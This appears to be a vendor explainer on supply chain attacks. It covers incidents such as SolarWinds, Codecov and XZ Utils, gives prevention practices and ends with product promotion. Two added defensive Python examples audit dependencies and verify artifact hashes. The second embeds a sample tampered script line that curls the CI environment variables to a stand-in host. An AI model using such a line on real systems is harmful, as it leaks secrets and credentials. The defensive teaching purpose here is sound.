What Is a Supply Chain Attack?
A supply chain attack aims to exploit the trust relationships between an organization and external parties. These relationships can include partnerships, vendor relationships, or the use of third-party software. A cyber threat actor compromises one organization and then moves up the supply chain, abusing these trusted relationships to gain access to other organizations' environments.

Supply Chain Attacks Are Surging
Given the outsized impact they can have, it is unsurprising that supply chain attacks have dramatically increased in recent years. Data shows that from 2021 to 2023, supply chain attacks grew by 431%.
- More recent data from Check Point’s State of Cyber Security 2025 report found hardware and software supply chains experienced the highest surge of attacks in 2024.
- The report found that the average number of attacks targeting software, hardware, and semiconductor companies increased by 179%.
Experts state this is due to the increased global demand for hardware and the focus on AI technologies. As a vital component of modern infrastructure and innovations, the technological supply chain is becoming a significant target for cyber criminals.
Exploiting supply chain vulnerabilities in these sectors provides many opportunities for:
- Financial gain
- Espionage
- Disruption
High-Profile Supply Chain Incidents
With the new attack vectors created by remote work and overburdened security teams, cybercriminals have plenty of opportunities to carry out supply chain attacks. Some of the largest in recent years include:
- SolarWinds: In 2020, a hacking group gained access to SolarWinds' production environment and embedded a backdoor in updates to its Orion network monitoring product. SolarWinds customers that ran the malicious update suffered data breaches and other security incidents.
- Kaseya: The REvil ransomware gang exploited Kaseya, a software company that supplies software to managed service providers (MSPs), to infect more than 1,000 customers with ransomware. The group demanded a $70 million ransom in exchange for a decryption key covering all affected customers.
- Codecov: Codecov is a software testing company whose Bash Uploader script (used to send code coverage reports to the company) was modified by an attacker. This supply chain compromise allowed the attacker to redirect sensitive information from Codecov customers' CI environments (source code, secrets, and so on) to a server under their own control.
- NotPetya: NotPetya is fake ransomware: malware that encrypts computers but does not keep the decryption key, which is what makes it a "wiper".
- The NotPetya attack started as a supply chain attack: a Ukrainian accounting software vendor was compromised and the malware was bundled into a malicious update to its software.
- Atlassian: In November 2020, Check Point Research (CPR) discovered a series of vulnerabilities that, combined, could be used to take over accounts and various Atlassian applications linked through SSO.
- What made these vulnerabilities a potential supply chain attack is that once an attacker had exploited the flaws and taken control of an account, they could install backdoors to exploit later.
- This could cause serious damage that would only be detected and contained after the harm was done.
- Check Point Research responsibly disclosed this information to the Atlassian team, and a fix was deployed so that users could continue to share information safely across the platforms.
- British Airways: In 2018, British Airways suffered a Magecart attack that compromised more than 380,000 transactions on the airline's website. The attack was the result of a supply chain compromise that breached one of the airline's suppliers and spread to British Airways, Ticketmaster, and other companies.
- Linux XZ: Discovered in 2024, the XZ Utils supply chain attack was a multi-year operation to insert a backdoor into the open-source project. XZ Utils (and its liblzma library) is widely used for compression on Linux.
- The backdoor allowed attackers holding a specific private key to execute code remotely on affected systems.
- The compromised versions of XZ Utils were not widely deployed when the backdoor was discovered, but they had already reached the development and testing releases of several Linux distributions. Experts stated that, had it gone undetected, the XZ backdoor could have given the attackers access to hundreds of millions of systems around the world.
How Supply Chain Attacks Work
Supply chain attacks exploit the trust relationships between different organizations. Every organization places a degree of implicit trust in other companies when it installs and runs their software on its network, or when it works with them as vendors.
Supply chain attacks target the weakest link in the chain of trust. If an organization has strong cybersecurity but one of its trusted vendors does not, the attacker goes after the vendor. With a foothold in the vendor's network, the attacker can then use that trusted relationship to pivot into the better-defended network.
One common type of supply chain attack target is the managed service provider (MSP). MSPs have deep access to their customers' networks, which is invaluable to an attacker. After compromising an MSP, the attacker can easily expand into the customers' networks. By exploiting vulnerabilities in the supply chain, these attackers achieve a much larger impact and can gain access to networks that would be far harder to attack directly. This is how the Kaseya attackers infected so many organizations with ransomware.
Other supply chain attacks use software to deliver malware to an organization's customers. For example, the SolarWinds attackers gained access to the company's build servers and injected a backdoor into an update to the SolarWinds Orion network monitoring product. When that update code was pushed to customers, the attackers gained access to their networks as well.
The Impact of Supply Chain Attacks
A supply chain attack is simply another way for an attacker to get past an organization's defenses. It can be used to carry out any type of cyberattack, for example:
- Data breaches: Supply chain attacks are commonly used to carry out data breaches. For example, the SolarWinds hack exposed the sensitive data of multiple public- and private-sector organizations.
- Malware infections: Cybercriminals frequently exploit supply chain vulnerabilities to deliver malware to target organizations. The SolarWinds attack delivered a malicious backdoor, and the Kaseya attack delivered ransomware through the compromised MSP management software.
What Makes Supply Chain Attacks Dangerous
Supply chain attacks are a significant concern because they don’t target your systems directly, but rather exploit your trust in others. Whenever you install and use a vendor’s software or add a third-party dependency to your own code, you’re implicitly placing your trust in that vendor’s security.
This exposes you to any mistakes that might be made by external organizations and developers.
For instance, you assume they didn’t accidentally introduce vulnerabilities to their software and regularly update their code to patch out new exploits as they are discovered.
This is a particular concern for open-source dependencies…
Open-Source Software
Relying on unpaid developers to continually update their open-source projects and respond to new threats can be a major supply chain weakness.
Supply chain attacks aren't trying to exploit the strongest link in the chain; they target the weakest. Therefore, even if you develop extensive internal security controls to protect your own systems, you can still be left exposed without proper third-party risk management strategies.
Supply Chain Breach & Backdoor
Plus, once hackers have a supply chain breach and add a backdoor to a piece of software that is widely used, they can launch far-reaching attacks with many victims. Cybercriminals can get a much larger return on investment by compromising third-party code.
Rather than attacking an organization head-on and getting one victim, they can go after the software supply chain and get many more victims from a single vulnerability.
This attracts some of the most sophisticated hackers and groups to find supply chain attack vectors.
How to Prevent Supply Chain Attacks
While these attacks are hard to detect and remediate, there are best practices for supply chain cybersecurity that you can implement to limit their impact. These processes can be broken down into third-party risk management approaches that improve your supply chain resilience, and internal practices that limit the impact of compromised systems.
Third-Party Risk Management
Assessing vendor security standards and managing the risk of using external software and dependencies is a critical aspect of supply chain cybersecurity. You need to rigorously assess your vendors and determine the security of their development practices.
Performing third-party risk assessments allows you to identify specific security policies you want vendors to implement to work with you.
Plus, you can group vendors based on the risk they pose (their internal security practices and how much access they have to your sensitive business data). Then, prioritize monitoring each vendor based on their vulnerability level. This includes:
- Identifying all open source dependencies
- Ensuring they remain active projects that still push updates based on the latest threats.
Beyond open source projects, patch management is a vital aspect across supply chain cybersecurity.
You have to maintain the latest software versions to ensure the window of risk posed by new vulnerabilities is as small as possible.
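As an added example (not code from the original page or from Check Point), the script below carries out the dependency inventory steps above over a constructed Python lockfile: it lists every dependency, flags specs that are not pinned to an exact version, flags projects whose last release is old enough to suggest they are no longer maintained, and matches pinned versions against an advisory list. The lockfile, the release dates in LAST_RELEASE and the advisory identifiers in ADVISORIES are all made up for illustration; a real run would take them from your repository, the package index and a vulnerability database.

```python
"""Dependency inventory and risk triage over a Python lockfile.

Added example, not code from the original page or from Check Point. All
package data below is constructed for illustration.
"""
import re
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Dict, List, Optional, Tuple

# Constructed lockfile (hypothetical project); mixes pinned, ranged and bare specs.
LOCKFILE = """\
requests==2.31.0
urllib3>=1.26        # range: resolves to whatever is newest at install time
flask==2.0.1
leftpad-py           # bare name: no version constraint at all
pyyaml==5.3.1
"""

# Constructed "last release" metadata per package (hypothetical dates).
LAST_RELEASE: Dict[str, date] = {
    "requests": date(2023, 5, 22),
    "urllib3": date(2024, 2, 18),
    "flask": date(2024, 1, 3),
    "leftpad-py": date(2017, 3, 1),
    "pyyaml": date(2021, 7, 7),
}

# Constructed advisory list: (package, exact version) -> hypothetical advisory id.
ADVISORIES: Dict[Tuple[str, str], str] = {
    ("flask", "2.0.1"): "EXAMPLE-ADV-0001",
    ("pyyaml", "5.3.1"): "EXAMPLE-ADV-0002",
}

# Date the audit is run against, so results are reproducible.
AUDIT_DATE = date(2024, 6, 1)

# name, optional operator, optional version; comments are cut off before matching.
SPEC_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(==|>=|<=|~=|!=|>|<)?\s*([^\s;]*)")


@dataclass
class Dependency:
    name: str
    operator: Optional[str]
    version: Optional[str]

    @property
    def pinned(self) -> bool:
        # Only an exact pin names one release; every other spec floats over time.
        return self.operator == "=="


def parse_lockfile(text: str) -> List[Dependency]:
    deps: List[Dependency] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = SPEC_RE.match(line)
        if m is None:
            continue
        name, op, ver = m.groups()
        deps.append(Dependency(name.lower(), op, ver or None))
    return deps


def triage(deps: List[Dependency], today: date,
           stale_after: timedelta = timedelta(days=730)) -> List[Tuple[str, str, str]]:
    """Return (package, finding, detail) triples; one package may have several."""
    findings: List[Tuple[str, str, str]] = []
    for d in deps:
        if not d.pinned:
            spec = f"{d.operator or ''}{d.version or ''}" or "(none)"
            findings.append((d.name, "unpinned",
                             f"spec {spec} accepts future releases; pin with == and a hash"))
        last = LAST_RELEASE.get(d.name)
        if last is None:
            findings.append((d.name, "unknown", "no release metadata; confirm the project exists"))
        elif today - last > stale_after:
            findings.append((d.name, "stale", f"last release {last.isoformat()}; may be unmaintained"))
        if d.pinned and (d.name, d.version) in ADVISORIES:
            findings.append((d.name, "vulnerable",
                             f"{d.version} matches {ADVISORIES[(d.name, d.version)]}; upgrade"))
    return findings


def audit() -> List[Tuple[str, str, str]]:
    """Run the whole inventory over the constructed lockfile."""
    return triage(parse_lockfile(LOCKFILE), AUDIT_DATE)


if __name__ == "__main__":
    for pkg, kind, detail in audit():
        print(f"{kind:<11} {pkg:<12} {detail}")
```

The staleness threshold (two years without a release) is a heuristic, not a verdict: a small, finished library can be quiet and still safe, while a busy project can ship a backdoor. Treat "stale" as a prompt to check the project's maintainer activity and issue tracker, and treat "unpinned" as the finding to fix first, because a floating spec means a future malicious release installs itself without any change on your side.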
Best Practices for Identifying and Mitigating Supply Chain Attacks
Supply chain attacks exploit insecure trust relationships between a company and other organizations. Some ways to mitigate the risk of these attacks include:
- Implement least privilege: Many organizations assign excessive access and permissions to their employees, partners, and software. These excessive permissions make supply chain attacks easier to carry out. Implement least privilege, and assign all personnel and software only the permissions they need to do their jobs.
- Perform network segmentation: Third-party software and partner organizations do not need unrestricted access to every corner of the network. Use network segmentation to divide the network into zones based on business function. That way, if a supply chain attack compromises part of the network, the rest remains protected.
- Follow DevSecOps practices: By integrating security into the development lifecycle, it is possible to detect whether software (such as the Orion update) has been maliciously modified.
- Automated threat prevention and threat hunting: Security operations center (SOC) analysts should protect against attacks across all of the organization's environments, including endpoints, network, cloud, and mobile devices.
Minimizing the Impact of a Supply Chain Breach
To minimize third-party supply chain risks, you need to reduce the access these systems have within your network. This includes introducing zero trust practices based on least privilege access. This makes applications and users continually verify their identity while only providing access to the systems they need, nothing more.
Another zero trust technique is network segmentation, which divides your systems into siloed sections with strong security controls on any movement between them.
Zero trust access controls reduce the impact of supply chain breaches by preventing lateral movement.
The attacker only has access to the initial compromised system and struggles to extend their access further. Other techniques to help prevent supply chain attacks include:
- Following DevSecOps best practices to test for vulnerabilities in any dependencies you use. You can improve software development visibility through a Software Bill of Materials (SBOM) that tracks details (source, version, etc.) of every dependency.
- Regularly scanning your system with malware prevention tools to prevent attacks from executing.
- Develop incident response plans that include considerations for supply chain attacks. This could include sandboxing new code before executing it to contain any backdoors.
- Track all of the applications and services employees use and uncover any shadow IT (unsanctioned applications) to ensure your supply chain attack surface is not larger than you realise.
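As an added example (not code from the original page or from Check Point), the script below ties together the DevSecOps point about detecting a maliciously modified artifact and the SBOM point about tracking each dependency's source and version: a small manifest records the name, version and SHA-256 digest of every external artifact a pipeline consumes, and verify() recomputes the digest of the bytes actually fetched and refuses anything unlisted or altered. The artifacts are constructed byte strings; the tampered copy imitates the kind of change seen in the Codecov incident, where an otherwise legitimate uploader script had an exfiltration command appended. Names, versions and the collector.invalid host are illustrative.

```python
"""Pin-and-verify third-party artifacts before they are executed.

Added example, not code from the original page or from Check Point. The
artifacts, names and versions below are constructed for illustration.
"""
import hashlib
import hmac
import json
from typing import Callable, Dict, Tuple

# Constructed "known good" uploader script as it was reviewed and vendored (hypothetical).
GOOD_UPLOADER = (
    b"#!/bin/bash\n"
    b"set -euo pipefail\n"
    b"report=$(find . -name 'coverage.xml' | head -n1)\n"
    b"curl -sS -X POST --data-binary @\"$report\" https://coverage.example/upload\n"
)

# Same script with one line appended that ships CI environment variables to an
# attacker-controlled host. Constructed to resemble a Codecov-style modification.
TAMPERED_UPLOADER = GOOD_UPLOADER + (
    b"curl -sm 0.5 -d \"$(env)\" http://collector.invalid/upload || true\n"
)

# Constructed package payload, so the manifest covers more than one kind of artifact.
GOOD_PACKAGE = b"PK\x03\x04...constructed wheel bytes..."

ARTIFACTS: Dict[str, Tuple[str, bytes]] = {
    "coverage-uploader": ("1.4.2", GOOD_UPLOADER),
    "acme-sdk": ("3.0.0", GOOD_PACKAGE),
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(artifacts: Dict[str, Tuple[str, bytes]]) -> dict:
    """Record name, version and digest of each reviewed artifact (a minimal SBOM)."""
    return {
        "format": "example-manifest/1",
        "components": [
            {"name": n, "version": v, "sha256": sha256_hex(c)}
            for n, (v, c) in sorted(artifacts.items())
        ],
    }


def verify(manifest: dict, name: str, data: bytes) -> Tuple[bool, str]:
    """Compare the digest of the fetched bytes with the pinned one; unlisted is a failure too."""
    entry = next((c for c in manifest["components"] if c["name"] == name), None)
    if entry is None:
        return False, f"{name}: not in manifest; refusing unlisted artifact"
    actual = sha256_hex(data)
    # Constant-time comparison: cheap here, and the habit carries over to real secrets.
    if not hmac.compare_digest(actual, entry["sha256"]):
        return False, (f"{name}: digest mismatch, expected {entry['sha256'][:16]}... "
                       f"got {actual[:16]}...")
    return True, f"{name} {entry['version']}: digest ok"


def run_if_verified(manifest: dict, name: str, data: bytes,
                    runner: Callable[[bytes], None]) -> Tuple[bool, str]:
    """Gate execution on verification; the runner is never called on a mismatch."""
    ok, msg = verify(manifest, name, data)
    if ok:
        runner(data)
    return ok, msg


if __name__ == "__main__":
    manifest = build_manifest(ARTIFACTS)
    print(json.dumps(manifest, indent=2))
    executed = []
    for label, blob in [("good", GOOD_UPLOADER), ("tampered", TAMPERED_UPLOADER)]:
        ok, msg = run_if_verified(manifest, "coverage-uploader", blob, executed.append)
        print(f"{label}: {msg}")
    print(f"scripts actually run: {len(executed)}")
```

The check is only as trustworthy as the manifest: if it is fetched from the same place as the artifact, an attacker who can alter one can alter both. Keep it in your own repository where changes go through review, or sign it, and update a pin only after someone has looked at what changed in the new version. A `curl ... | bash` step, the pattern the Codecov incident exploited, skips this check entirely.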
Protecting Against Supply Chain Attacks with Check Point
Supply chain attackers can exploit a lack of monitoring in an organization's environment. Check Point Harmony Endpoint helps organizations protect against these threats by monitoring applications for suspicious behavior that could lead to a breach.
To learn more about the types of attacks that Harmony Endpoint protects against, check out Check Point's 2021 Cyber Security Report. Then, take a security checkup to learn about the security issues in your environment. You can also learn how to close these security gaps with a free demo.